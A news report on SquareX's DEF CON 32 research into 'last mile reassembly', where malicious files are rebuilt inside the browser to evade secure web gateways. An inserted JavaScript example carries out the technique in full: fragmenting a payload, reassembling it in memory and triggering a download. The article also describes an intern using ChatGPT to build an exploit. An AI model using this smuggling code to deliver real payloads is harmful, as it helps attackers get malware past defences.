DEF CON 32: the unfixable bug that allows malware to be deployed via a browser


A fundamental weakness in how secure web gateways (SWGs) work opens virtually any business, organization, or user to “last mile reassembly” attacks, in which a malicious file is rebuilt inside the browser and so never passes the gateway as a file, SquareX researchers announced at the DEF CON 32 conference.

With cyber threats permeating the online world, enterprise protection tools have never been in greater demand. Millions of businesses worldwide rely on SWG vendors to provide exactly that – a guarantee that an employee or a user will not download a malicious file, which could lead to ransomware attacks, intellectual property theft, or loss of personal data.

Because of that, the SWG industry, which includes players like Cloudflare, Cisco, Palo Alto, Fortinet, and many others, is a multi-billion dollar business. However, Vivek Ramachandran, a cybersecurity veteran and SquareX’s founder, claims he has found a fundamental and easily exploitable flaw in how SWGs work.

Generally, SWGs inspect all incoming and outgoing traffic and analyze it in the cloud in real time. If an SWG solution detects something suspicious, it blocks the threat before it can reach the device. However, Ramachandran explained to Cybernews that there’s a catch: for an SWG to catch a threat, the threat has to travel through the gateway as a recognizable file.

“The trigger for an SWG to work is a file download is happening. So, what if we could completely kill that chain where the SWG doesn't even know a file is being downloaded?” Ramachandran said.

Imagine you want to smuggle a dangerous item, like a pistol, into a location that doesn’t allow it. If you tried to carry the whole item, security would very likely discover it. However, Ramachandran explained, if several individuals each carried in only one part of the pistol, they’d be far less likely to raise any alarm. Applied to the web, each fragment of the file arrives as an innocuous-looking request, and the dangerous whole only exists once the browser puts the fragments back together. Welcome to last mile reassembly.

“What we came up with was what if we could change every conventional attack like a file download, a file upload, a malicious website and recreate it to work and to be built entirely in the browser,” Ramachandran explained.

According to him, his team came up with a staggering 25 different bypasses of SWG protections from major solution providers, each of which could be used to infect the target device through every popular web browser.

The kicker is that the weakness is not an oversight or something that can be patched with an update. Ramachandran explained that while SWGs can analyze the traffic, they are completely blind to what is happening inside the browser – a blind spot that SquareX researchers claim to have successfully exploited.

“The only way an SWG can detect last mile reassembly is if the browser state is being sent back to the cloud almost in a synchronized way. And to scale this for millions of requests is just not possible. And that's where we feel that these are architectural vulnerabilities, which no SWG can patch without changing their business model as the price would go up from like a dollar per user per month to $1,000 per user per month.” Ramachandran told Cybernews.
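To make the smuggling analogy and the blind spot concrete, here is an added example that is not SquareX’s code or any of their 25 bypasses, and carries no malware: a harmless constructed text payload is split into fragments on the attacker’s side, and the victim’s browser reassembles them and hands the result to the user as a download. The chunk size and the four-byte “DEMO” marker are assumptions chosen so that no single fragment carries the marker a content scanner would key on; on the wire, a gateway sees only a few opaque strings and never a file.

```javascript
// Added example, not from the original page or from SquareX.
// Constructed, harmless payload. Real attacks would carry a real executable.
const PAYLOAD_TEXT = "DEMO payload: this text stands in for a smuggled file\n";
// Assumed "magic bytes" a per-response scanner might look for (hypothetical).
const SIGNATURE = "DEMO";

// Attacker/server side: cut the file into fragments and base64-encode each.
// A chunk size smaller than the signature guarantees no fragment contains it.
function splitIntoChunks(bytes, chunkSize) {
  const chunks = [];
  for (let i = 0; i < bytes.length; i += chunkSize) {
    chunks.push(bytes.subarray(i, i + chunkSize));
  }
  return chunks;
}

// btoa/atob work on binary strings; these helpers run in browsers and Node 16+.
function bytesToBase64(bytes) {
  let bin = "";
  for (const b of bytes) bin += String.fromCharCode(b);
  return btoa(bin);
}

function base64ToBytes(b64) {
  const bin = atob(b64);
  const out = new Uint8Array(bin.length);
  for (let i = 0; i < bin.length; i++) out[i] = bin.charCodeAt(i);
  return out;
}

// What a gateway that keys on file signatures would see: does any single
// fragment, on its own, contain the marker?
function anyChunkContainsSignature(chunksB64, signature) {
  return chunksB64.some((c) => new TextDecoder().decode(base64ToBytes(c)).includes(signature));
}

// Victim/browser side: the "last mile" step. The file only exists here.
function reassemble(chunksB64) {
  const parts = chunksB64.map(base64ToBytes);
  const total = parts.reduce((n, p) => n + p.length, 0);
  const out = new Uint8Array(total);
  let offset = 0;
  for (const p of parts) {
    out.set(p, offset);
    offset += p.length;
  }
  return out;
}

// Hand the reassembled bytes to the user as a download. Only runs in a
// browser; returns false elsewhere (e.g. Node) so the rest stays testable.
function deliverAsDownload(bytes, filename) {
  if (typeof document === "undefined" || typeof URL.createObjectURL !== "function") {
    return false;
  }
  const blob = new Blob([bytes], { type: "application/octet-stream" });
  const url = URL.createObjectURL(blob);
  const a = document.createElement("a");
  a.href = url;
  a.download = filename;
  a.click();            // no network request: the gateway never sees this file
  URL.revokeObjectURL(url);
  return true;
}

// End-to-end run, returning everything worth checking.
function demo(chunkSize = 3) {
  const original = new TextEncoder().encode(PAYLOAD_TEXT);
  const chunksB64 = splitIntoChunks(original, chunkSize).map(bytesToBase64);
  const rebuilt = reassemble(chunksB64);
  return {
    chunkCount: chunksB64.length,
    signatureVisibleOnWire: anyChunkContainsSignature(chunksB64, SIGNATURE),
    rebuiltText: new TextDecoder().decode(rebuilt),
    delivered: deliverAsDownload(rebuilt, "demo.txt"),
  };
}
```

In a real page the fragments would be fetched from several URLs or embedded inline in script, but the gateway-side view is the same: short opaque strings with no file type, no `Content-Disposition`, and no intact signature. Everything that turns them back into a file happens in browser memory, which is the state Ramachandran says the gateway never sees.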

Exploited by an intern

What’s worse is that to carry out a last mile reassembly attack, the threat actor doesn’t need to be highly sophisticated. This is not because the attack path is simple but because large language models lower the bar an attacker has to clear.

“I feel that a year back, I would have said that only attackers above a certain sophistication level could have exploited this. Maybe even going to state-sponsored attacker level. But now we have LLMs helping to code,” Ramachandran said.

To test this thesis, SquareX recruited an intern. The team told the person what a last mile reassembly attack was and instructed them to build an exploit. The striking part, Ramachandran said, is that after going back and forth with ChatGPT, the intern successfully built a working exploit.

“Writing code has become such a laughable, commoditized thing that doing that isn't an impediment at all. I didn’t have to write a single line of code. We just got an intern and described the attacks,” Ramachandran explained.

Meanwhile, he admitted, SWG vendors’ reactions to his findings were mixed. After being told about the weakness, some went silent, others acknowledged the issue was novel yet had no solution, and a third group claimed they had already been aware of the problem.

“Because SWG protection has kind of become an industry standard, everybody, including heads of security at companies, just takes it for granted. I think that's the bigger worry: if you aren't fully aware of the limitations of the technology stack you use,” Ramachandran said.